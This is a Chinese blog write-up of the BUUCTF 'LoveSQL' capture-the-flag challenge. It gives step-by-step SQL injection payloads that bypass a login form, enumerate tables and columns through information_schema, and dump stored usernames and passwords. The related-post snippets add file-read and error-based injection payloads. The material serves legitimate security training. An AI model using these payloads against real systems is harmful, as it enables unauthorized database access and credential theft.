buuctf-web-[极客大挑战 2019]LoveSQL

最新推荐文章于 2024-09-09 11:04:38 发布
最新推荐文章于 2024-09-09 11:04:38 发布
阅读量288 收藏
点赞数
分类专栏: web SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46079186/article/details/118383844
版权

  1. 输入用户名admin’ 密码随便输
    在这里插入图片描述

  2. 页面报错
    0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NjA3OTE4Ng==,size_16,color_FFFFFF,t_70)

  3. 尝试用万能用户名绕过
    用户名输入:admin’or 1=1 # 密码随便输
    在这里插入图片描述
    登入成功
    在这里插入图片描述

  4. 密码md5 解密一下没解出来,继续从登入框下手
    admin’ order by 4 # 页面出错,说明3个列
    在这里插入图片描述

  5. 输入admin’ union select 1,2,3 #
    在这里插入图片描述页面进入登入成功
    在这里插入图片描述6. 继续寻找回显点
    1’union select 1,2,3 %23 // 这里用户名输什么都行就是不能输admin ,输admin 会进入登录成功页面,还有 # 要改成url编码%23 才可以

在这里插入图片描述

  1. 1’union select 1,2,database() %23
    数据库名 geek
    在这里插入图片描述
    8.1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schmea=‘geek’ %23
    表名:geekuser,l0ve1ysq1
    在这里插入图片描述9. 1’ union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘l0ve1ysq1’ %23
    字段:id,username,password
    在这里插入图片描述10. l0ve1ysq1表字段内容
    1’ union select 1,group_concat(username),group_concat(password) from geekuser %23
    使用group_concat() 函数列出所有字段内容
    拿到flag flag{7e02ccbf-e488-4005-9ce7-9ca597530362}
    在这里插入图片描述
~ Venus
关注
专栏目录
BUUCTF web 极客挑战 2019
菜的只能随便写写博客
04-01 1807
0x01 Secret File  在源码之中得到一个php页面  后面页面之中  根据提示抓包,在其中返回的页面得到了信息  得到源码,根据源码,发现存在文件包含漏洞  利用php伪协议,获取flag.php的信息,拿取flag payload: ?file=php://filter/read=convert.base64-encode/resource=flag.php EasyS...
BUUCTF-WEB
ccfly1012的博客
11-02 3896
目录 [HCTF 2018]WarmUp [极客挑战 2019]EasySQL 总结万能密码 [极客挑战 2019]Havefun [强网杯 2019]随便注 [ACTF2020 新生赛]Include [SUCTF 2019]EasySQL [极客挑战 2019]Secret File [ACTF2020 新生赛]Exec [极客挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping [HCTF 2018]WarmUp 打开网页,查看一下源代
Buuctf-web-[极客挑战2019]LoveSQL
Yinger699的博客
06-16 300
[极客挑战 2019]LoveSQL 首先打开这个界面,发现画面和上次做的[极客挑战】easySQL类似。所以我们用万能密码试一下。 usename=admin;password=1’or’1’=‘1 发现用户错误,然后该换admin’#试一下,登录成功 接下来我们用SQL注入来做 1.首先查询字段数 check.php?username=admin’ order by 4%23&password=1%27or%271%271%3D%271 (因为url没有自动对#进行编码,所以我们要手动输
[CTF夺旗赛] CTFshow Web1-12 详细过程保姆级教程~
最新发布
Da1NtY的博客
09-09 2482
CTFShow通常是指网络安全领域中的“Capture The Flag”(夺旗赛)展示工具或平台。这是一种用于分享、学习和展示信息安全竞赛中获取的信息、漏洞利用技巧以及解题思路的在线社区或软件。参与者会在比赛中收集“flag”,通常是隐藏在网络环境中的数据或密码形式,然后通过分析、破解等手段找到并提交。CTFShow可以帮助人们了解最新的安全技术和挑战,同时也促进了安全知识和技术的交流。
buuctf-web极客挑战2019
qq_47804678的博客
02-08 356
于是用bp使用post方式,注意将user=0改成user=1(意思也就是:是cuit的学生为真。一开始我还改成了“cuit's students”。一共就两个页面,就都看一下,发现还有提示:必须是cuit的学生,还得写对密码。如果不加密直接返回的话,flag.php被解析后是看不到有flag的源文件的,所以只能加密然后用在线工具再进行解密得到源文件。bp抓包发现中间302跳转时给了另一个路径secr3t.php,尝试访问,F12找到隐藏的路径.Archive_romm.php,尝试访问,
BUUCTF-Web】 [极客挑战 2019]PHP
RexHa的博客
09-04 771
BUUCTF-Web】 [极客挑战 2019]PHP
BUUCTF WEB [极客挑战 2019]HardSQL
Y1da的博客
04-17 600
BUUCTF WEB [极客挑战 2019]HardSQL 万能密码、union联合注入等关键词and、union等均被过滤,尝试报错注入 爆破库名 1'or(extractvalue(1,concat(1,database())))# XPATH syntax error: 'geek' 爆破表名 1'or(extractvalue(1,concat(1,(select(table_name)from(information_schema.tables)where(table_schema
BUUCTF--WEB
书山有路勤为径,学海无涯苦作舟
06-28 1285
可以猜测,这个输入框是搜索当前数据库里的表id号应该,回显得数据就是表words里的两个字段id和data,但是我们flag在当前数据库的。他的后端既然能做到数字回显字母不回显,说明有一个 或 结构,而且不直接回显flag,但作为一道题目,from一定是from flag。mb_substr($page,n,m):返回page中从第n位开始,到n+m位字符串的值。再跳转到新的页面什么也没有就结束了,所以在这个页面,我们请点击抓包,就能发现他的秘密。内联函数:将指定的函数体插入并取代每一处调用该函数的地方。
BUUCTF刷题记录[SUCTF 2019]EasySQL && [极客挑战 2019]LoveSQL
weixin_44120469的博客
12-04 168
BUUCTF刷题记录 [SUCTF 2019]EasySQL && [极客挑战 2019]LoveSQL [SUCTF 2019]EasySQL 这道题确实把我困住了 只有一个输入框,fuzz之后发现过滤了不少东西,显示Nonono 输入1之后显示 而且不管输入几都是这个界面 但是输入字母不是。 在这里我确实没有想到要去猜测后台查询字符的格式。 然而可以通过这里猜测到后台语句中有一个|| 1;show databases# 查询数据库信息 1;show table
buuctf-web部分wp(更新一下)
a3uRa的一个窝
02-17 3800
前言(撮合看看吧 因为直接复制的本地 所以图片就没法显示了 有什么不懂的地方可以给我留言哦~ 然后推荐一个公众号:lin先森 求关注) b站 [BJDCTF2020]Easy MD5 f12 Hint: select * from ‘admin’ where password=md5($pass,true) ffifdyop 弱类型绕过 数组绕过 [极客挑战 2019]Http 修改头 [...
BUUCTF WEB LOVESQL
m0_46315342的博客
08-20 1061
BUUCTF WEB LOVESQL 这个题考的是普通的联合注入,但是有一个比较坑的地方就是注释符,所以以后一定要多试试注释符。这个题是这样的,如果你直接写# 或者 --+ 这样的,就得不到想要的界面,这里需要对注释符进行url编码,换成%23这样的 设置用户名为123,密码为111登陆试一下 在用户名处设置’ “试一下 只有设置为单引号的时候有报错信息,然后试一下万能密码 ’ or 1=1# 出现了这样的情况,原因竟然是注释符要换成编码过的%23 然后就是正常的流程了(这个题目usern
BUUCTF WEB [极客挑战 2019]LoveSQL
Y1da的博客
04-16 181
BUUCTF WEB [极客挑战 2019]LoveSQL 进入靶机后尝试万能密码登录 admin 123' or '1'='1 获得flag Login Success! Hello admin! Your password is 'c5d37b949a4f2c5f002aa623826c209f'
BUUCTF WEB 极客挑战 2019 LoveSQL
Ethan552525的博客
07-27 554
题目: 解题: 1:输入万能密码 用户名:admin' or 1=1# 密 码:1 2:确定回显列 用户名:1' union select 1,2,3;# (select 1,2...逐步增加,直到不报错即得到正确的列数) 密 码:1 说明查询列数为3,回显列为2,3。 UNION 操作符用于合并两个或多个 SELECT 语句的结果集。 ...
BUUCTF-web [极客挑战 2019]PHP1
zzqzzq11的博客
08-06 926
buuctf
buuctf-web-[极客挑战 2019]Havefun1
mlws1900的博客
07-23 263
获得flag,或者后面输入。
BUUCTF -> Web [极客挑战 2019]Http(详解)
m0_72986388的博客
09-25 1765
之后界面会显示“No!" 是一个URL,指向一个名为 "Sycsecret.buuoj.cn" 的网站或资源。这样就会得到flag之后将flag输入到靶场中这道题就完成了。User-Agent:标识发起请求的用户代理(常为浏览器)。(因为做笔记,所以重新做的,所以显示早就解出这道题了。Referer(请求头字段)表示指示请求的来源页面。所以我们要把此段的浏览器改为Syclover浏览器。"理解为一个链接地址。这样我们就得到了解决本题的有用信息。
BUUCTF-web-[极客挑战 2019]Secret File
weixin_44866139的博客
05-16 3857
查看源码之后发现achieve_room.php 点击secret,发现end.php 提示回去再仔细看看,查看achieve.php的源代码 发现action.php,访问,然而依旧回到了end.php 说明这个跳转的时间特别快,我们需要抓包,有一个抓包神器BrupSuite,使用它发现action有一个隐藏的回应 <html> <title>secret</title> <meta charset="UTF-8"> <?php
BUUCTF-WEB-[极客挑战 2019]Upload
r1727337824的博客
09-06 545
BUUCTF-WEB-[极客挑战 2019]Upload》
buuctf_web_[极客挑战 2019]BuyFlag
m0_62008601的博客
04-01 412
本题主要是考察数据传参以及一些简单的绕过。小白一枚 可能写得不太好,大家可以一起交流,共同进步。
buuctf web 极客挑战2019
08-24
对于BUUCTF Web极客挑战2019,我了解到它是一个网络安全比赛,由北方工业大学举办。这个比赛旨在考察参赛者的网络攻防能力和Web漏洞挖掘技术。比赛的题目涵盖了Web安全的各个方面,包括但不限于漏洞利用、代码审计...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值